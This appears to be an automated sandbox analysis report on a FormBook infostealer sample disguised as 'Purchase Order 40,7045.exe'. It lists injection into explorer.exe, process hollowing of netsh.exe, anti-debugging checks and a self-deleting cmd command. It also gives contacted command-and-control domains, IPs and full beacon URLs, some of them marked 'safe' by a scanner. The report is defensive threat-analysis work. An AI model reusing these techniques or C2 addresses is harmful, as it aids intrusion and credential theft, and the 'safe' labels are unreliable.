Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039399BF mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\netsh.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_0086F175 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_00871C5F SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_0086BEA1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 119.81.172.165 80
Source: C:\Windows\explorer.exe	Network Connect: 160.153.136.3 80
Source: C:\Windows\explorer.exe	Network Connect: 45.194.171.26 80
Source: C:\Windows\explorer.exe	Network Connect: 74.208.236.115 80
Source: C:\Windows\explorer.exe	Network Connect: 3.138.72.189 80
Source: C:\Windows\explorer.exe	Network Connect: 168.206.180.179 80
Source: C:\Windows\explorer.exe	Network Connect: 13.248.196.204 80
Source: C:\Windows\explorer.exe	Network Connect: 35.246.6.109 80
Source: C:\Windows\explorer.exe	Network Connect: 192.185.213.99 80
Source: C:\Windows\explorer.exe	Network Connect: 208.91.197.160 80
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe	Network Connect: 54.208.77.124 80
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.212 80

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Section loaded: unknown target: C:\Users\user\Desktop\Purchase Order 40,7045.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Thread register set: target process: 3388
Source: C:\Windows\SysWOW64\netsh.exe	Thread register set: target process: 3388

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe

Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: D90000

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Process created: C:\Users\user\Desktop\Purchase Order 40,7045.exe C:\Users\user\Desktop\Purchase Order 40,7045.exe
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Order 40,7045.exe'

Source: explorer.exe, 00000002.00000000.241465822.0000000001398000.00000004.00000020.sdmp	Binary or memory string: ProgmanamF
Source: explorer.exe, 00000002.00000000.241593673.0000000001980000.00000002.00000001.sdmp, netsh.exe, 00000003.00000002.500552216.0000000005070000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000002.00000000.241593673.0000000001980000.00000002.00000001.sdmp, netsh.exe, 00000003.00000002.500552216.0000000005070000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.241593673.0000000001980000.00000002.00000001.sdmp, netsh.exe, 00000003.00000002.500552216.0000000005070000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.241593673.0000000001980000.00000002.00000001.sdmp, netsh.exe, 00000003.00000002.500552216.0000000005070000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: GetLocaleInfoA,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe

Code function: 0_2_0087237A GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000001.00000002.268815779.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.268789568.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.498785295.00000000036C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.238738017.00000000009A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.498889826.00000000036F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.Purchase Order 40,7045.exe.9a0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Purchase Order 40,7045.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order 40,7045.exe.9a0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Purchase Order 40,7045.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000001.00000002.268815779.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.268789568.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.498785295.00000000036C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.238738017.00000000009A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.498889826.00000000036F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.Purchase Order 40,7045.exe.9a0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Purchase Order 40,7045.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order 40,7045.exe.9a0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Purchase Order 40,7045.exe.400000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Path Interception	Process Injection512	Disable or Modify Tools1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Shared Modules1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion2	LSASS Memory	Security Software Discovery131	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection512	Security Account Manager	Virtualization/Sandbox Evasion2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information3	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing1	Cached Domain Credentials	System Information Discovery112	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Purchase Order 40,7045.exe	40%	Virustotal		Browse
Purchase Order 40,7045.exe	33%	ReversingLabs	Win32.Trojan.Generic
Purchase Order 40,7045.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.Purchase Order 40,7045.exe.7f0000.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.2.Purchase Order 40,7045.exe.9a0000.3.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
1.2.Purchase Order 40,7045.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
sweetbasilmarketing.com	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.heartandcrowncloset.com/igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4hm34ORqosTB	0%	Avira URL Cloud	safe
http://www.placeduconfort.com/igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MP3xgLgHQaOW	0%	Avira URL Cloud	safe
http://www.namofast.com/igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=hBI3Otxb8cB+II9lzJ/uJul9cug51W/gKrRcuXZMLk1SgBX4+5ai4onE9bbZmy8EPFIt	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.hyx20140813.com/igqu/?JBZ0nHS=j1Gd3/8+Zp+B40J0jTVmXVq6mMmQz5+yQk6aMNkaRX/kF+TSG97NiOE47oBU/CZqG/X0&BZ=E2J8Yj-0_Jl	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.ownumo.com/igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=BH7z2/jEm+RXv1AveM5Ny8HPgQaM4+SZjjoRC+WvTj9yxW6+9eUgrkLGeqsoRVoWzUxA	0%	Avira URL Cloud	safe
http://www.trafegopago.com/igqu/?JBZ0nHS=donhjXNh7kLY1iCc+SlENWzt8x7IoGbTUq/N2y8xDHDKv1jZWtQO4VPvuCjZtFGhRuQ3&BZ=E2J8Yj-0_Jl	0%	Avira URL Cloud	safe
http://www.primeworldgroup.com/igqu/?JBZ0nHS=gtAjDyhewVv0wP+pLldDDzZVOHZuvXFhM8dcKQ7x+XbEhwRlJbrCtCBURlOjpb7ofbaF&BZ=E2J8Yj-0_Jl	0%	Avira URL Cloud	safe
http://www.chemtradent.com/igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=K/S7l+gZOJHSbd5nxE/i7D8w4PbP25DXYiwy4kAXmG/uB5hJOsw6W9LAHFEaROkrMNd5	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.coveloungewineandwhiskey.com/igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=EbC/lMdsFrxYIRmxU9JVdurtFZV4D4JG65XX9u0TQDrH/vXXo4aXqz2TK/FSo60698x+	0%	Avira URL Cloud	safe
http://www.cashintl.com/igqu/?JBZ0nHS=PWpJYgsY9Lk6DRwPIX8cv6KhXmybDFPY4MU69hncqnsQxDtzy2cy3R/Xc4N+OU84E/9z&BZ=E2J8Yj-0_Jl	100%	Avira URL Cloud	malware
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.covid19salivatestdirect.com/igqu/?JBZ0nHS=cBWwxeNBZw14c0R1jn0Ws/yQjDXlXErbhexqVqcZJ/j9HX594bSs/9hubjzw4SjFPh4C&BZ=E2J8Yj-0_Jl	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.plantpowered.energy/igqu/?JBZ0nHS=SGVuGExhnGF4yxDyK5xX6Vc4jl6qy7oMTqbPjfmzMsQE0E0I89iRcikd677eURgEdiQj&BZ=E2J8Yj-0_Jl	0%	Avira URL Cloud	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.capitalcitybombers.com/igqu/?JBZ0nHS=iX1DJYif3eJ2qCI9y9y3neEoNBEbwEqOJ7CoPPWNank/pdm5KGiwxeIXvmA+SDcpynqB&BZ=E2J8Yj-0_Jl	0%	Avira URL Cloud	safe
http://www.obsessingwealth.com/igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=+vzchlDpP8hhVSy3W5GjgGJ1ZPT8aqTFt8VTi3L78WqIr+4DtdDaKL74hph6Iza73r7P	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.cashintl.com	54.208.77.124	true	true		unknown
td-balancer-euw2-6-109.wixdns.net	35.246.6.109	true	true		unknown
parkingpage.namecheap.com	198.54.117.212	true	false		high
sweetbasilmarketing.com	185.201.11.126	true	false	2%, Virustotal, Browse	unknown
coveloungewineandwhiskey.com	34.102.136.180	true	true		unknown
capitalcitybombers.com	34.102.136.180	true	true		unknown
www.chemtradent.com	45.194.171.26	true	true		unknown
bailedao.leboweb.com	119.81.172.165	true	true		unknown
trafegopago.com	192.185.213.99	true	true		unknown
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com	3.138.72.189	true	false		high
www.primeworldgroup.com	168.206.180.179	true	true		unknown
www.namofast.com	13.248.196.204	true	true		unknown
www.covid19salivatestdirect.com	208.91.197.160	true	true		unknown
www.ownumo.com	74.208.236.115	true	true		unknown
heartandcrowncloset.com	160.153.136.3	true	true		unknown
www.heartandcrowncloset.com	unknown	unknown	true		unknown
www.coveloungewineandwhiskey.com	unknown	unknown	true		unknown
www.trafegopago.com	unknown	unknown	true		unknown
www.placeduconfort.com	unknown	unknown	true		unknown
www.obsessingwealth.com	unknown	unknown	true		unknown
cdn.onenote.net	unknown	unknown	true		unknown
www.hyx20140813.com	unknown	unknown	true		unknown
www.capitalcitybombers.com	unknown	unknown	true		unknown
www.plantpowered.energy	unknown	unknown	true		unknown
www.sweetbasilmarketing.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.heartandcrowncloset.com/igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4hm34ORqosTB	true	Avira URL Cloud: safe	unknown
http://www.placeduconfort.com/igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MP3xgLgHQaOW	true	Avira URL Cloud: safe	unknown
http://www.namofast.com/igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=hBI3Otxb8cB+II9lzJ/uJul9cug51W/gKrRcuXZMLk1SgBX4+5ai4onE9bbZmy8EPFIt	true	Avira URL Cloud: safe	unknown
http://www.hyx20140813.com/igqu/?JBZ0nHS=j1Gd3/8+Zp+B40J0jTVmXVq6mMmQz5+yQk6aMNkaRX/kF+TSG97NiOE47oBU/CZqG/X0&BZ=E2J8Yj-0_Jl	true	Avira URL Cloud: safe	unknown
http://www.ownumo.com/igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=BH7z2/jEm+RXv1AveM5Ny8HPgQaM4+SZjjoRC+WvTj9yxW6+9eUgrkLGeqsoRVoWzUxA	true	Avira URL Cloud: safe	unknown
http://www.trafegopago.com/igqu/?JBZ0nHS=donhjXNh7kLY1iCc+SlENWzt8x7IoGbTUq/N2y8xDHDKv1jZWtQO4VPvuCjZtFGhRuQ3&BZ=E2J8Yj-0_Jl	true	Avira URL Cloud: safe	unknown
http://www.primeworldgroup.com/igqu/?JBZ0nHS=gtAjDyhewVv0wP+pLldDDzZVOHZuvXFhM8dcKQ7x+XbEhwRlJbrCtCBURlOjpb7ofbaF&BZ=E2J8Yj-0_Jl	true	Avira URL Cloud: safe	unknown
http://www.chemtradent.com/igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=K/S7l+gZOJHSbd5nxE/i7D8w4PbP25DXYiwy4kAXmG/uB5hJOsw6W9LAHFEaROkrMNd5	true	Avira URL Cloud: safe	unknown
http://www.coveloungewineandwhiskey.com/igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=EbC/lMdsFrxYIRmxU9JVdurtFZV4D4JG65XX9u0TQDrH/vXXo4aXqz2TK/FSo60698x+	true	Avira URL Cloud: safe	unknown
http://www.cashintl.com/igqu/?JBZ0nHS=PWpJYgsY9Lk6DRwPIX8cv6KhXmybDFPY4MU69hncqnsQxDtzy2cy3R/Xc4N+OU84E/9z&BZ=E2J8Yj-0_Jl	true	Avira URL Cloud: malware	unknown
http://www.covid19salivatestdirect.com/igqu/?JBZ0nHS=cBWwxeNBZw14c0R1jn0Ws/yQjDXlXErbhexqVqcZJ/j9HX594bSs/9hubjzw4SjFPh4C&BZ=E2J8Yj-0_Jl	true	Avira URL Cloud: safe	unknown
http://www.plantpowered.energy/igqu/?JBZ0nHS=SGVuGExhnGF4yxDyK5xX6Vc4jl6qy7oMTqbPjfmzMsQE0E0I89iRcikd677eURgEdiQj&BZ=E2J8Yj-0_Jl	true	Avira URL Cloud: safe	unknown
http://www.capitalcitybombers.com/igqu/?JBZ0nHS=iX1DJYif3eJ2qCI9y9y3neEoNBEbwEqOJ7CoPPWNank/pdm5KGiwxeIXvmA+SDcpynqB&BZ=E2J8Yj-0_Jl	true	Avira URL Cloud: safe	unknown
http://www.obsessingwealth.com/igqu/?BZ=E2J8Yj-0_Jl&JBZ0nHS=+vzchlDpP8hhVSy3W5GjgGJ1ZPT8aqTFt8VTi3L78WqIr+4DtdDaKL74hph6Iza73r7P	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.tiro.com	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.coml	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
